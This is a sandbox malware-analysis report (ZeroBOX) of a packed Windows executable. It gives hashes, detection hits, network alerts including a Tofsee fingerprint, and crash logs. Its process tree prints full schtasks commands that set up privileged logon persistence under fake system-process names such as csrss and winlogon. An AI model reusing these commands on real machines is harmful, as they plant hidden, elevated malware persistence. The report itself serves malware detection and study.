Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 30, 2021, 10:28 a.m.	July 30, 2021, 10:32 a.m.

Size	3.6MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f31199c1fccb1fe693824f89573e4194`
SHA256	`3ab850d582976fd9c1bb14c1c50cffa66e9fd6e55fc27a704f01c45d1bc251dc`
CRC32	`271BA116`
ssdeep	`98304:GUFI1/p+td2Uf1u1xBKlhVr+4k0fBtkAV8JqhBnO/EuYVKPFswc:D6Uf1u1HKnVrTNBtkbqC8FKKwc`
Yara	IsPE32 - (no description) anti_vm_detect - Possibly employs anti-virtualization techniques Is_DotNET_EXE - (no description) themida_packer - themida packer PE_Header_Zero - PE File Signature

Desktop.exe "C:\Users\test22\AppData\Local\Temp\Desktop.exe"
1604
- schtasks.exe "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f
  2292
- schtasks.exe "schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f
  2352
- schtasks.exe "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f
  2412
- schtasks.exe "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f
  2540
- schtasks.exe "schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f
  2600
- schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f
  2660
- schtasks.exe "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f
  2768
- cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat"
  2840
  - chcp.com chcp 65001
    2912
  - PING.EXE ping -n 5 localhost
    2956
  - lsm.exe "C:\Python27\libs\lsm.exe"
    3020

Name	Response	Post-Analysis Lookup
ipinfo.io	A 34.117.59.81	34.117.59.81

IP Address	Status	Action
164.124.101.2	Active	Moloch
34.117.59.81	Active	Moloch
62.109.1.30	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49177 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49177 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.102:49177	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49177 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	2a:93:c5:f6:21:4b:14:40:41:d9:36:fe:ff:fe:65:37:17:1c:4e:b8

Queries for the computername (24 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:28 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 30, 2021, 10:28 a.m.			0	0
IsDebuggerPresent July 30, 2021, 10:28 a.m.			0	0
IsDebuggerPresent July 30, 2021, 10:28 a.m.			0	0
IsDebuggerPresent July 30, 2021, 10:28 a.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: SUCCESS: The scheduled task "conhost" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: SUCCESS: The scheduled task "IMEDICTUPDATE" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: SUCCESS: The scheduled task "csrss" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: SUCCESS: The scheduled task "winlogon" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: SUCCESS: The scheduled task "lsm" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: SUCCESS: The scheduled task "taskhost" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1
WriteConsoleW July 30, 2021, 10:28 a.m.	buffer: Active code page: 65001 console_handle: 0x00000013	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 30, 2021, 10:28 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 events)

section
section	.imports
section	.themida
section	.boot

One or more processes crashed (18 events)

Time & API	Arguments	Status
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: desktop+0x5c6530 @ 0x1676530 desktop+0x453ad4 @ 0x1503ad4 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 c8 f9 96 8c 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x748ab727 registers.esp: 3997276 registers.edi: 18702336 registers.eax: 3997276 registers.ebp: 3997356 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 1998418987 registers.ecx: 3273785344	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: exception.instruction_r: ed e9 58 7a 01 00 c3 e9 fe 84 03 00 99 ae e5 3c exception.symbol: desktop+0x5c3a78 exception.instruction: in eax, dx exception.module: Desktop.exe exception.exception_code: 0xc0000096 exception.offset: 6044280 exception.address: 0x1673a78 registers.esp: 3997396 registers.edi: 20920013 registers.eax: 1750617430 registers.ebp: 18702336 registers.edx: 22614 registers.ebx: 2147483650 registers.esi: 20575618 registers.ecx: 20	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: exception.instruction_r: ed e9 ae 84 02 00 77 00 a6 31 d6 b4 fd ff 50 00 exception.symbol: desktop+0x5d2814 exception.instruction: in eax, dx exception.module: Desktop.exe exception.exception_code: 0xc0000096 exception.offset: 6105108 exception.address: 0x1682814 registers.esp: 3997396 registers.edi: 20920013 registers.eax: 1447909480 registers.ebp: 18702336 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 20575618 registers.ecx: 10	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: lsm+0x5c6530 @ 0x15e6530 lsm+0x453ad4 @ 0x1473ad4 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 c8 f9 8d 8c 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x748ab727 registers.esp: 2357164 registers.edi: 18112512 registers.eax: 2357164 registers.ebp: 2357244 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 1998418987 registers.ecx: 229113856	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: exception.instruction_r: ed e9 58 7a 01 00 c3 e9 fe 84 03 00 99 ae e5 3c exception.symbol: lsm+0x5c3a78 exception.instruction: in eax, dx exception.module: lsm.exe exception.exception_code: 0xc0000096 exception.offset: 6044280 exception.address: 0x15e3a78 registers.esp: 2357284 registers.edi: 20330189 registers.eax: 1750617430 registers.ebp: 18112512 registers.edx: 22614 registers.ebx: 2147483650 registers.esi: 19985794 registers.ecx: 20	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: exception.instruction_r: ed e9 ae 84 02 00 77 00 a6 31 d6 b4 fd ff 50 00 exception.symbol: lsm+0x5d2814 exception.instruction: in eax, dx exception.module: lsm.exe exception.exception_code: 0xc0000096 exception.offset: 6105108 exception.address: 0x15f2814 registers.esp: 2357284 registers.edi: 20330189 registers.eax: 1447909480 registers.ebp: 18112512 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 19985794 registers.ecx: 10	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c23498 0x6c233f1 0x59cd2cf mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124251664 registers.edi: 124251784 registers.eax: 0 registers.ebp: 124251676 registers.edx: 51843304 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c2352a 0x6c233f1 0x59cd2cf mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124247248 registers.edi: 124251784 registers.eax: 0 registers.ebp: 124247260 registers.edx: 51843988 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c236f6 0x6c23651 0x59cd326 mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124251664 registers.edi: 124251784 registers.eax: 0 registers.ebp: 124251676 registers.edx: 51844592 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c23786 0x6c23651 0x59cd326 mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124247248 registers.edi: 124251784 registers.eax: 0 registers.ebp: 124247260 registers.edx: 51845136 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c238b6 0x6c23811 0x59cd37d mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124251664 registers.edi: 124251784 registers.eax: 0 registers.ebp: 124251676 registers.edx: 51845740 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c23946 0x6c23811 0x59cd37d mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124247248 registers.edi: 124251784 registers.eax: 0 registers.ebp: 124247260 registers.edx: 51846292 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c238b6 0x6c23d50 0x6c23a47 0x6c239d1 0x59cd3d1 mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124251492 registers.edi: 124251612 registers.eax: 0 registers.ebp: 124251504 registers.edx: 51846908 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c23946 0x6c23d50 0x6c23a47 0x6c239d1 0x59cd3d1 mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124247072 registers.edi: 124251612 registers.eax: 0 registers.ebp: 124247084 registers.edx: 51847460 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c23498 0x6c23d90 0x6c23a56 0x6c239d1 0x59cd3d1 mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d 